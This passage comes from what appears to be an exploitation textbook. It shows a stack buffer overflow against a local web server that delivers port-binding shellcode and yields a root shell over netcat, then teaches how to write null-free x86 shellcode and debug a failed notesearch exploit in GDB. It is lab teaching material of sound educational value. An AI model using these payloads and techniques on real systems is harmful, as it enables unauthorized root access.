f9 b0 0b 52 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 | ...Rh//shh/bin..
52 89 e2 53 89 e1 cd 80 90 90 90 90 90 90 90 90 | R..S............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 88 f6 ff bf | ................
0d 0a                                           | ..
reader@hacking:~/booksrc $ nc -vv 127.0.0.1 31337
localhost [127.0.0.1] 31337 (?) open
whoami
root
ls -l /etc/passwd 
-rw-r--r-- 1 root root 1545 Sep  9 16:24 /etc/passwd

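Even though the remote shell doesn't display a prompt, it still accepts commands and returns the output over the network.

A program like netcat can be used for many other things. It's designed to work like a console program, allowing standard input and output to be piped and redirected. Using netcat and the port-binding shellcode in a file, the same exploit can be carried out on the command line.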

reader@hacking:~/booksrc $ wc -c portbinding_shellcode
92 portbinding_shellcode
reader@hacking:~/booksrc $ echo $((540+4 - 300 - 92))
152
reader@hacking:~/booksrc $ echo $((152 / 4))
38
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x300';
> cat portbinding_shellcode 
> perl -e 'print "\x88\xf6\xff\xbf"x38 . "\r\n"')

"␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣ jfX␣1␣CRj j ␣␣ ␣␣jfXC
RfhzifS␣␣j QV␣␣ ␣fCCSV␣␣ ␣fCRRV␣␣ ␣j Y␣? Iy␣␣
                                            Rh//shh/bin␣␣R␣␣S␣␣ ␣␣␣␣␣␣␣␣
"␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
"␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x300'; cat portbinding_shellcode; 
perl -e 'print "\x88\xf6\xff\xbf"x38 . "\r\n"') | nc -v -w1 127.0.0.1 80
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ nc -v 127.0.0.1 31337
localhost [127.0.0.1] 31337 (?) open
whoami 
root

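In the output above, the length of the port-binding shellcode is first shown to be 92 bytes. The return address is found 540 bytes from the start of the buffer, so with a 300-byte NOP sled and 92 bytes of shellcode, there are 152 bytes left through the end of the return address overwrite (540 + 4 - 300 - 92). This means that if the target return address is repeated 38 times at the end of the buffer, the last one should do the overwrite. Finally, the buffer is terminated with '\r\n'. The commands that build the buffer are grouped with parentheses so the buffer can be piped into netcat. netcat connects to the tinyweb program and sends the buffer. After the shellcode runs, netcat needs to be broken out of by pressing CTRL-C, since the original socket connection is still open. Then, netcat is used again to connect to the shell bound on port 31337.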
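The shell arithmetic used in that session generalizes to any sled and payload size. The sketch below only restates the calculation; address_repeat_count is a hypothetical helper name, and it assumes 4-byte addresses as on 32-bit x86.

```c
#include <stddef.h>

/* Number of 4-byte address copies needed after the sled and payload so that
 * the final copy lands exactly on the saved return address at ret_offset.
 * Returns 0 if the pieces do not fit or the remainder is not 4-byte aligned. */
size_t address_repeat_count(size_t ret_offset, size_t sled_len, size_t payload_len) {
   const size_t addr_size = 4;
   size_t end = ret_offset + addr_size; /* One past the overwritten address. */
   size_t remaining;

   if (sled_len + payload_len > end)
      return 0;

   remaining = end - sled_len - payload_len;
   if (remaining % addr_size != 0)
      return 0;

   return remaining / addr_size;
}
```

For the values above, address_repeat_count(540, 300, 92) is 38, since 544 - 392 leaves 152 bytes. A result of 0 signals that the sled length needs adjusting so the repeated addresses stay aligned with the return address slot.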

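Chapter 0x500. Shellcode

So far, the shellcode used in our exploits has been just a string of copied and pasted bytes. We have seen standard shell-spawning shellcode for local exploits and port-binding shellcode for remote ones. Shellcode is also sometimes referred to as an exploit payload, since these self-contained programs do the real work once a program has been hacked. Shellcode usually spawns a shell, as that is an elegant way to hand off control; but it can do anything a program can do.

Unfortunately, for many hackers the shellcode story stops at copying and pasting bytes. These hackers are just scratching the surface of what's possible. Custom shellcode gives you absolute control over the exploited program. Perhaps you want your shellcode to add an admin account to /etc/passwd or to automatically remove lines from log files. Once you know how to write your own shellcode, your exploits are limited only by your imagination. In addition, writing shellcode develops assembly language skills and employs a number of hacking techniques worth knowing.

Assembly vs. C

The shellcode bytes are actually architecture-specific machine instructions, so shellcode is written using assembly language. Writing a program in assembly is different from writing it in C, but many of the principles are similar. The operating system manages things like input, output, process control, file access, and network communication in the kernel. Compiled C programs ultimately perform these tasks by making system calls to the kernel. Different operating systems have different sets of system calls.

In C, standard libraries are used for convenience and portability. A C program that uses printf() to output a string can be compiled for many different systems, since the library knows the appropriate system calls for various architectures. A C program compiled on an x86 processor will produce x86 assembly language.

By definition, assembly language is already specific to a certain processor architecture, so portability is impossible. There are no standard libraries; instead, kernel system calls have to be made directly. To begin our comparison, let's write a simple C program, then rewrite it in x86 assembly.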


helloworld.c

#include <stdio.h>
int main() {
  printf("Hello, world!\n");
  return 0;
}

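When the compiled program is run, execution flows through the standard I/O library, eventually making a system call to write the string Hello, world! to the screen. The strace program is used to trace a program's system calls. Used on the compiled helloworld program, it shows every system call that program makes.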

reader@hacking:~/booksrc $ gcc helloworld.c
reader@hacking:~/booksrc $ strace ./a.out
execve("./a.out", ["./a.out"], [/* 27 vars */]) = 0
brk(0)                                  = 0x804a000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef6000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=61323, ...}) = 0
mmap2(NULL, 61323, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ee7000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20Z\1\000"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1248904, ...}) = 0
mmap2(NULL, 1258876, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7db3000
mmap2(0xb7ee0000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3,
 0x12c) =
0xb7ee0000
mmap2(0xb7ee4000, 9596, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) =

0xb7ee4000
close(3)                                = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7db2000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7db26b0, limit:1048575, seg_32bit:1,
contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
mprotect(0xb7ee0000, 8192, PROT_READ)   = 0
munmap(0xb7ee7000, 61323)               = 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef5000
`write(1, "Hello, world!\n", 13Hello, world! )          = 13`
exit_group(0)                           = ?
Process 11528 detached
reader@hacking:~/booksrc $

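As you can see, the compiled program does more than just print a string. The system calls at the start set up the environment and memory for the program, but the important part is the write() syscall shown in bold. This is what actually outputs the string.

The Unix manual pages (accessed with the man command) are separated into sections. Section 2 contains the manual pages for system calls, so man 2 write will describe the use of the write() system call:

Man Page for the write() System Call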

WRITE(2)                   Linux Programmer's Manual                   WRITE(2)

NAME
       write - write to a file descriptor

SYNOPSIS
       #include <unistd.h>

       ssize_t write(int fd, const void *buf, size_t count);

DESCRIPTION
       write() writes up to count bytes to the file referenced by the file
       descriptor fd from the buffer starting at buf. POSIX requires that a
       read() which can be proved to occur after a write() returns the new
       data. Note that not all file systems are POSIX conforming.

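The strace output also shows the arguments for the syscall. The buf and count arguments are a pointer to our string and its length. The fd argument of 1 is a special standard file descriptor. File descriptors are used for almost everything in Unix: input, output, file access, network sockets, and so on. A file descriptor is similar to a number given out at a coat check. Opening a file descriptor is like checking in your coat, since you are given a number that can later be used to reference your coat. The first three file descriptor numbers (0, 1, and 2) are automatically used for standard input, output, and error. These values are standard and have been defined in several places, such as the /usr/include/unistd.h file shown below.

From /usr/include/unistd.h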

/* Standard file descriptors. */
#define STDIN_FILENO  0 /* Standard input.  */
#define STDOUT_FILENO 1 /* Standard output.  */
#define STDERR_FILENO 2 /* Standard error output. */

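Writing bytes to standard output's file descriptor of 1 will print the bytes; reading from standard input's file descriptor of 0 will input bytes. The standard error file descriptor of 2 is used to display error or debugging messages that can be filtered from the standard output.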
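To see the descriptor numbers at work without the standard I/O library in the way, the string can be handed straight to write(). This is a minimal sketch; write_message is a made-up helper name used only for illustration.

```c
#include <string.h>
#include <unistd.h>

/* Send a NUL-terminated message to a file descriptor using write(2) directly,
 * with no stdio buffering. Returns the number of bytes written, or -1 on error. */
ssize_t write_message(int fd, const char *msg) {
   return write(fd, msg, strlen(msg));
}
```

Calling write_message(STDOUT_FILENO, "Hello, world!\n") prints the greeting and returns 14, while passing STDERR_FILENO sends the same bytes to standard error instead. The function works equally well on a descriptor for a file, pipe, or socket.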

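Linux System Calls in Assembly

Every possible Linux system call is enumerated, so they can be referenced by number when making the calls in assembly. These syscalls are listed in /usr/include/asm-i386/unistd.h.

From /usr/include/asm-i386/unistd.h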

#ifndef _ASM_I386_UNISTD_H_
#define _ASM_I386_UNISTD_H_

/*
 * This file contains the system call numbers.
 */

#define __NR_restart_syscall      0
`#define __NR_exit       1`
#define __NR_fork       2
#define __NR_read       3
`#define __NR_write      4`
#define __NR_open       5
#define __NR_close      6
#define __NR_waitpid    7
#define __NR_creat      8
#define __NR_link       9
#define __NR_unlink    10
#define __NR_execve    11
#define __NR_chdir     12
#define __NR_time      13
#define __NR_mknod     14
#define __NR_chmod     15
#define __NR_lchown    16
#define __NR_break     17
#define __NR_oldstat   18
#define __NR_lseek     19
#define __NR_getpid    20
#define __NR_mount     21
#define __NR_umount    22
#define __NR_setuid    23
#define __NR_getuid    24
#define __NR_stime     25
#define __NR_ptrace    26
#define __NR_alarm     27
#define __NR_oldfstat  28
#define __NR_pause     29
#define __NR_utime     30
#define __NR_stty      31
#define __NR_gtty      32
#define __NR_access    33
#define __NR_nice      34
#define __NR_ftime     35
#define __NR_sync      36
#define __NR_kill      37
#define __NR_rename    38
#define __NR_mkdir     39
...

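For our rewrite of helloworld.c in assembly, we will make a system call to the write() function for the output and then a second system call to exit() so the process quits cleanly. This can be done in x86 assembly using just two assembly instructions: mov and int.

Assembly instructions for the x86 processor have one, two, three, or no operands. The operands to an instruction can be numerical values, memory addresses, or processor registers. The x86 processor has several 32-bit registers that can be viewed as hardware variables. The registers EAX, EBX, ECX, EDX, ESI, EDI, EBP, and ESP can all be used as operands, while the EIP register (execution pointer) cannot.

The mov instruction copies a value between its two operands. Using Intel assembly syntax, the first operand is the destination and the second is the source. The int instruction sends an interrupt signal to the kernel, defined by its single operand. With the Linux kernel, interrupt 0x80 is used to tell the kernel to make a system call. When the int 0x80 instruction is executed, the kernel will make a system call based on the first four registers. The EAX register is used to specify which system call to make, while the EBX, ECX, and EDX registers are used to hold the first, second, and third arguments to the system call. All of these registers can be set using the mov instruction.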
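The same "number first, then arguments" convention is visible from C through the generic syscall() wrapper provided by glibc. The sketch below is only an analogy: raw_write is an invented name, SYS_write is 4 on 32-bit x86 but has a different value on other architectures, and on most modern systems the wrapper does not use int 0x80 internally.

```c
#define _GNU_SOURCE
#include <sys/syscall.h>
#include <unistd.h>

/* Make the write system call by number through syscall(2).
 * SYS_write plays the role of the value loaded into EAX; fd, buf, and count
 * correspond to the values loaded into EBX, ECX, and EDX on 32-bit x86. */
long raw_write(int fd, const void *buf, unsigned long count) {
   return syscall(SYS_write, fd, buf, count);
}
```

raw_write(1, "Hello, world!\n", 14) writes the 14-byte string to standard output, just as the library's write() function would.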

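In the following assembly code listing, the memory segments are simply declared. The string "Hello, world!" with a newline character (0x0a) is in the data segment, and the actual assembly instructions are in the text segment. This follows proper memory segmentation practices.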

helloworld.asm

section .data       ;  Data segment
msg     db      "Hello, world!", 0x0a    ; The string and newline char

section .text       ; Text segment
global _start       ; Default entry point for ELF linking

_start:

; SYSCALL: write(1, msg, 14)
mov eax, 4        ; Put 4 into eax, since write is syscall #4.
mov ebx, 1        ; Put 1 into ebx, since stdout is 1.
mov ecx, msg      ; Put the address of the string into ecx.
mov edx, 14       ; Put 14 into edx, since our string is 14 bytes.
int 0x80          ; Call the kernel to make the system call happen.

; SYSCALL: exit(0)
mov eax, 1        ; Put 1 into eax, since exit is syscall #1.
mov ebx, 0        ; Exit with success.
int 0x80          ; Do the syscall.

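The instructions of this program are straightforward. For the write() syscall to standard output, the value of 4 is put in EAX, since the write() function is system call number 4. Then, the value of 1 is put into EBX, since the first argument of write() should be the file descriptor for standard output. Next, the address of the string in the data segment is put into ECX, and the length of the string (in this case, 14 bytes) is put into EDX. After these registers are loaded, the system call interrupt is triggered, which will call the write() function.

To exit cleanly, the exit() function needs to be called with a single argument of 0. So the value of 1 is put into EAX, since exit() is system call number 1, and the value of 0 is put into EBX, since the first and only argument should be 0. Then the system call interrupt is triggered again.

To create an executable binary, this assembly code must first be assembled and then linked into an executable format. When compiling C code, the GCC compiler takes care of all of this automatically. We are going to create an executable and linking format (ELF) binary, so the global _start line shows the linker where the assembly instructions begin.

The nasm assembler with the -f elf argument will assemble helloworld.asm into an object file ready to be linked as an ELF binary. By default, this object file will be called helloworld.o. The linker program ld will produce an executable a.out binary from the assembled object.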

reader@hacking:~/booksrc $ nasm -f elf helloworld.asm
reader@hacking:~/booksrc $ ld helloworld.o
reader@hacking:~/booksrc $ ./a.out
Hello, world!
reader@hacking:~/booksrc $

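This tiny program works, but it's not shellcode, since it isn't self-contained and must be linked.

The Path to Shellcode

Shellcode is literally injected into a running program, where it takes over like a biological virus inside a cell. Since shellcode isn't really an executable program, we don't have the luxury of declaring the layout of data in memory or even using other memory segments. Our instructions must be self-contained and ready to take over control of the processor regardless of its current state. This is commonly referred to as position-independent code.

In shellcode, the bytes for the string "Hello, world!" must be mixed together with the bytes for the assembly instructions, since there aren't definable or predictable memory segments. This is fine as long as EIP doesn't try to interpret the string as instructions. However, to access the string as data we need a pointer to it. When the shellcode gets executed, it could be anywhere in memory. The string's absolute memory address needs to be calculated relative to EIP. Since EIP cannot be accessed from assembly instructions, however, we need to use some sort of trick.

Assembly Instructions Using the Stack

The stack is so integral to the x86 architecture that there are special instructions for its operations.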

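Instruction	Description
`push <source>`	Push the source operand to the stack.
`pop <destination>`	Pop a value from the stack and store it in the destination operand.
`call <location>`	Call a function, jumping execution to the address in the location operand. This location can be relative or absolute. The address of the instruction following the call is pushed to the stack, so that execution can return later.
`ret`	Return from a function, popping the return address from the stack and jumping execution there.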

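Stack-based exploits are made possible by the call and ret instructions. When a function is called, the return address of the next instruction is pushed to the stack, beginning the stack frame. After the function is finished, the ret instruction pops the return address from the stack and jumps EIP back there. By overwriting the stored return address on the stack before the ret instruction, we can take control of a program's execution.

This architecture can be misused in another way to solve the problem of addressing the inline string data. If the string is placed directly after a call instruction, the address of the string will get pushed to the stack as the return address. Instead of calling a function, we can jump past the string to a pop instruction that will take the address off the stack and into a register. The following assembly instructions demonstrate this technique.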

helloworld1.s

BITS 32             ;  Tell nasm this is 32-bit code.

  call mark_below   ;  Call below the string to instructions
  db "Hello, world!",  0x0a, 0x0d  ; with newline and carriage return bytes.

mark_below:
; ssize_t write(int fd,  const void *buf, size_t count);
  pop ecx           ; Pop  the return address (string ptr) into ecx.
  mov eax, 4        ; Write  syscall #.
  mov ebx, 1        ; STDOUT  file descriptor
  mov edx, 15       ; Length of the string
  int 0x80          ; Do syscall: write(1, string, 15)

; void _exit(int status);
  mov eax, 1        ; Exit syscall #
  mov ebx, 0        ; Status = 0
  int 0x80          ; Do syscall:  exit(0)

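The call instruction jumps execution down below the string. This also pushes the address of the next instruction to the stack, which in our case is the beginning of the string. The return address can immediately be popped from the stack into the appropriate register. Without using any memory segments, these raw instructions, injected into an existing process, will execute in a completely position-independent way. This means that, when these instructions are assembled, they cannot be linked into an executable.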

reader@hacking:~/booksrc $ nasm helloworld1.s
reader@hacking:~/booksrc $ ls -l helloworld1
-rw-r--r-- 1 reader reader 50 2007-10-26 08:30 helloworld1
reader@hacking:~/booksrc $ hexdump -C helloworld1
00000000  e8 0f 00 00 00 48 65 6c  6c 6f 2c 20 77 6f 72 6c  |.....Hello, worl|
00000010  64 21 0a 0d 59 b8 04 00  00 00 bb 01 00 00 00 ba  |d!..Y...........|
00000020  0f 00 00 00 cd 80 b8 01  00 00 00 bb 00 00 00 00  |................|
00000030  cd 80                                             |..|
00000032
reader@hacking:~/booksrc $ ndisasm -b32 helloworld1
00000000  E80F`000000`        call 0x14
00000005  48                dec eax
00000006  656C              gs insb
00000008  6C                insb
00000009  6F                outsd
0000000A  2C20              sub al,0x20
0000000C  776F              ja 0x7d
0000000E  726C              jc 0x7c
00000010  64210A            and [fs:edx],ecx
00000013  0D59B80400        or eax,0x4b859
00000018  0000              add [eax],al
0000001A  BB01000000        mov ebx,0x1
0000001F  BA0F000000        mov edx,0xf
00000024  CD80              int 0x80
00000026  B801000000        mov eax,0x1
0000002B  BB00000000        mov ebx,0x0
00000030  CD80              int 0x80
reader@hacking:~/booksrc $

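The nasm assembler converts assembly language into machine code, and a corresponding tool called ndisasm converts machine code into assembly. These tools are used above to show the relationship between the machine code bytes and the assembly instructions. The disassembled instructions at offsets 0x05 through 0x13 come from the bytes of the "Hello, world!" string being interpreted as instructions.

Now, if we can inject this shellcode into a program and redirect EIP, the program will print out Hello, world! Let's use the familiar exploit target of the notesearch program.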

reader@hacking:~/booksrc $ export SHELLCODE=$(cat helloworld1)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9c6
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xc6\xf9\xff\xbf"x40')
-------[ end of note data ]-------
Segmentation fault
reader@hacking:~/booksrc $

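Failure. Why do you think it crashed? In situations like this, GDB is your best friend. Even if you already know the reason behind this specific crash, learning how to effectively use a debugger will help you solve many other problems in the future.

Investigating with GDB

Since the notesearch program runs as root, we can't debug it as a normal user. However, we also can't just attach to a running copy of it, because it exits too quickly. Another way to debug programs is with core dumps. From a root prompt, the OS can be told to dump memory when the program crashes by using the command ulimit -c unlimited. This means that dumped core files are allowed to get as big as needed. Now, when the program crashes, the memory will be dumped to disk as a core file, which can be examined using GDB.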

reader@hacking:~/booksrc $ sudo su
root@hacking:/home/reader/booksrc # ulimit -c unlimited
root@hacking:/home/reader/booksrc # export SHELLCODE=$(cat helloworld1)
root@hacking:/home/reader/booksrc # ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9a3
root@hacking:/home/reader/booksrc # ./notesearch $(perl -e 'print "\xa3\xf9\xff\xbf"x40')
-------[ end of note data ]-------
Segmentation fault (core dumped)
root@hacking:/home/reader/booksrc # ls -l ./core
-rw------- 1 root root 147456 2007-10-26 08:36 ./core
root@hacking:/home/reader/booksrc # gdb -q -c ./core
(no debugging symbols found)
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
Core was generated by './notesearch
£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E.
Program terminated with signal 11, Segmentation fault.
#0  0x2c6541b7 in ?? ()
(gdb) set dis intel
(gdb) x/5i 0xbffff9a3
0xbffff9a3:     call   0x2c6541b7
0xbffff9a8:     ins    BYTE PTR es:[edi],[dx]
0xbffff9a9:     outs   [dx],DWORD PTR ds:[esi]
0xbffff9aa:     sub    al,0x20
0xbffff9ac:     ja     0xbffffa1d
(gdb) i r eip
eip            0x2c6541b7        0x2c6541b7
(gdb) x/32xb 0xbffff9a3
0xbffff9a3:     0xe8    0x0f    0x48    0x65    0x6c    0x6c    0x6f    0x2c
0xbffff9ab:     0x20    0x77    0x6f    0x72    0x6c    0x64    0x21    0x0a
0xbffff9b3:     0x0d    0x59    0xb8    0x04    0xbb    0x01    0xba    0x0f
0xbffff9bb:     0xcd    0x80    0xb8    0x01    0xbb    0xcd    0x80    0x00
(gdb) quit
root@hacking:/home/reader/booksrc # hexdump -C helloworld1
00000000  e8 0f 00 00 00 48 65 6c  6c 6f 2c 20 77 6f 72 6c  |.....Hello, worl|
00000010  64 21 0a 0d 59 b8 04 00  00 00 bb 01 00 00 00 ba  |d!..Y...........|
00000020  0f 00 00 00 cd 80 b8 01  00 00 00 bb 00 00 00 00  |................|
00000030  cd 80                                             |..|
00000032
root@hacking:/home/reader/booksrc #

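Once GDB is loaded, the disassembly style is switched to Intel. Since we are running GDB as root, the .gdbinit file won't be used. The memory where the shellcode should be is examined. The instructions look incorrect, and it seems the first incorrect call instruction is what caused the crash. At least execution was redirected, but something went wrong with the shellcode bytes. Normally, strings are terminated by a null byte, but here, the shell was kind enough to remove these null bytes for us. This, however, totally destroys the meaning of the machine code. Often, shellcode will be injected into a process as a string, using functions like strcpy(). Such functions will simply terminate at the first null byte, producing incomplete and unusable shellcode in memory. In order for the shellcode to survive transit, it must be redesigned so it doesn't contain any null bytes.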
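How little survives a string copy is easy to measure. The sketch below uses memchr() to find where a strcpy()-style copy would stop; the function name and the eight-byte sample array (the first bytes of helloworld1 from the hexdump) are only illustrative.

```c
#include <stddef.h>
#include <string.h>

/* First 8 bytes of the assembled helloworld1 file, taken from the hexdump. */
static const unsigned char helloworld1_head[] = {
   0xe8, 0x0f, 0x00, 0x00, 0x00, 0x48, 0x65, 0x6c
};

/* Number of bytes a string function such as strcpy() would copy before it
 * stops at the first null byte. Returns src_len if there is no null byte. */
size_t bytes_before_first_null(const unsigned char *src, size_t src_len) {
   const unsigned char *nul = memchr(src, 0x00, src_len);
   return nul ? (size_t)(nul - src) : src_len;
}
```

For helloworld1_head the result is 2: only the 0xe8 opcode and the 0x0f byte would be copied, and everything after the first null byte would be lost.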

Removing Null Bytes

Looking at the disassembly, it is obvious that the first null bytes come from the call instruction.

reader@hacking:~/booksrc $ ndisasm -b32 helloworld1
00000000  E80F`000000`        call 0x14
00000005  48                dec eax
00000006  656C              gs insb
00000008  6C                insb
00000009  6F                outsd
0000000A  2C20              sub al,0x20
0000000C  776F              ja 0x7d
0000000E  726C              jc 0x7c
00000010  64210A            and [fs:edx],ecx
00000013  0D59B80400        or eax,0x4b859
00000018  0000              add [eax],al
0000001A  BB01000000        mov ebx,0x1
0000001F  BA0F000000        mov edx,0xf
00000024  CD80              int 0x80
00000026  B801000000        mov eax,0x1
0000002B  BB00000000        mov ebx,0x0
00000030  CD80              int 0x80
reader@hacking:~/booksrc $

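This instruction jumps execution forward by 15 (0x0f) bytes, to offset 0x14, based on its operand. The call instruction allows for much longer jump distances, which means that a small value like 15 has to be padded with leading zeros, resulting in null bytes.

One way around this problem takes advantage of two's complement. A small negative number will have its leading bits turned on, resulting in 0xff bytes. This means that, if we call using a negative value to move backward in execution, the machine code for that instruction won't have any null bytes. The following revision of the helloworld shellcode uses a standard implementation of this trick: jump to the end of the shellcode to a call instruction which, in turn, will jump back to a pop instruction at the beginning of the shellcode.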

helloworld2.s

BITS 32             ;  Tell nasm this is 32-bit code.

  jmp short one     ; Jump down to a call at the end.

two:
; ssize_t write(int fd,  const void *buf, size_t count);
  pop ecx           ;  Pop the return address (string ptr) into ecx.
  mov eax, 4        ;  Write syscall #.
  mov ebx, 1        ;  STDOUT file descriptor
  mov edx, 15       ;  Length of the string
  int 0x80          ;  Do syscall: write(1, string, 15)

; void _exit(int status);
  mov eax, 1        ; Exit syscall #
  mov ebx, 0        ; Status = 0
  int 0x80          ; Do syscall: exit(0)

one:
  call two          ; Call back upwards to avoid null bytes
  db "Hello, world!", 0x0a, 0x0d  ; with newline and carriage return bytes.

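After assembling this new shellcode, disassembly shows that the call instruction (shown in italics below) is now free of null bytes. This solves the first and most difficult null-byte problem for this shellcode, but there are still many other null bytes (shown in bold).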

reader@hacking:~/booksrc $ nasm helloworld2.s
reader@hacking:~/booksrc $ ndisasm -b32 helloworld2
00000000  EB1E              jmp short 0x20
00000002  59                pop ecx
00000003  B804`000000`        mov eax,0x4
00000008  BB01`000000`        mov ebx,0x1
0000000D  BA0F`000000`        mov edx,0xf
00000012  CD80              int 0x80
00000014  B801`000000`        mov eax,0x1
00000019  BB`00000000`        mov ebx,0x0
0000001E  CD80              int 0x80
*`00000020  E8DDFFFFFF        call 0x2`*
00000025  48                dec eax
00000026  656C              gs insb
00000028  6C                insb
00000029  6F                outsd
0000002A  2C20              sub al,0x20
0000002C  776F              ja 0x9d
0000002E  726C              jc 0x9c
00000030  64210A            and [fs:edx],ecx
00000033  0D                db 0x0D
reader@hacking:~/booksrc $

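These remaining null bytes can be eliminated with an understanding of register widths and addressing. Notice that the first jmp instruction is actually jmp short. This means execution can only jump a maximum of approximately 128 bytes in either direction. The normal jmp instruction, as well as the call instruction (which has no short version), allows for much longer jumps. The difference between the assembled machine code for the two jump varieties is shown below: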

	EB 1E              jmp short 0x20

versus

	E9 1E 00 00 00     jmp 0x23

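The EAX, EBX, ECX, EDX, ESI, EDI, EBP, and ESP registers are 32 bits wide. The E stands for extended, because these were originally 16-bit registers called AX, BX, CX, DX, SI, DI, BP, and SP. These original 16-bit versions can still be used to access the low 16 bits of each corresponding 32-bit register. Furthermore, the individual bytes of the AX, BX, CX, and DX registers can be accessed as 8-bit registers called AL, AH, BL, BH, CL, CH, DL, and DH, where L stands for low byte and H for high byte. Naturally, assembly instructions using the smaller registers only need to specify operands up to the register's bit width. The three variations of a mov instruction are shown below.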

Machine code	Assembly
`B8 04 00 00 00`	`mov eax,0x4`
`66 B8 04 00`	`mov ax,0x4`
`B0 04`	`mov al,0x4`
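Writing through a narrower register name changes only the addressed part of the 32-bit register and leaves the other bits as they were. The following C sketch models that behavior with masks; the function names `write_al`, `write_ah`, and `write_ax` are invented for illustration and do not come from the book.

```c
#include <stdint.h>

/* Model "mov al, imm8": only bits 0-7 of EAX change. */
uint32_t write_al(uint32_t eax, uint8_t imm)
{
    return (eax & 0xFFFFFF00u) | imm;
}

/* Model "mov ah, imm8": only bits 8-15 of EAX change. */
uint32_t write_ah(uint32_t eax, uint8_t imm)
{
    return (eax & 0xFFFF00FFu) | ((uint32_t)imm << 8);
}

/* Model "mov ax, imm16": only bits 0-15 of EAX change. */
uint32_t write_ax(uint32_t eax, uint16_t imm)
{
    return (eax & 0xFFFF0000u) | imm;
}
```

Starting from a leftover value such as 0xDEADBEEF, `write_al(eax, 4)` yields 0xDEADBE04 rather than 4, which is why a full register has to be zeroed before its low byte is loaded.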

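Using the AL, BL, CL, or DL register puts the correct least significant byte into the corresponding extended register without creating any null bytes in the machine code. However, the top three bytes of the register could still contain anything. This is especially true for shellcode, since it will be taking over another process. If we want the 32-bit register values to be correct, we need to zero out the entire register before the mov instructions, but this, again, must be done without using null bytes. Here are some more simple assembly instructions for your arsenal. The first two are small instructions that increment and decrement their operand by one.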

Instruction	Description
`inc <target>`	Increments the target operand by adding 1 to it.
`dec <target>`	Decrements the target operand by subtracting 1 from it.

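The next few instructions, like the mov instruction, have two operands. They all do simple arithmetic and bitwise logical operations between the two operands, storing the result in the first operand.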

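Instruction	Description
`add <dest>, <source>`	Adds the source operand to the destination operand, storing the result in the destination.
`sub <dest>, <source>`	Subtracts the source operand from the destination operand, storing the result in the destination.
`or <dest>, <source>`	Performs a bitwise or logic operation, comparing each bit of one operand with the corresponding bit of the other operand (1 or 0 = 1; 1 or 1 = 1; 0 or 1 = 1; 0 or 0 = 0). If the source bit or the destination bit is on, or if both of them are on, the result bit is on; otherwise, the result bit is off. The final result is stored in the destination operand.
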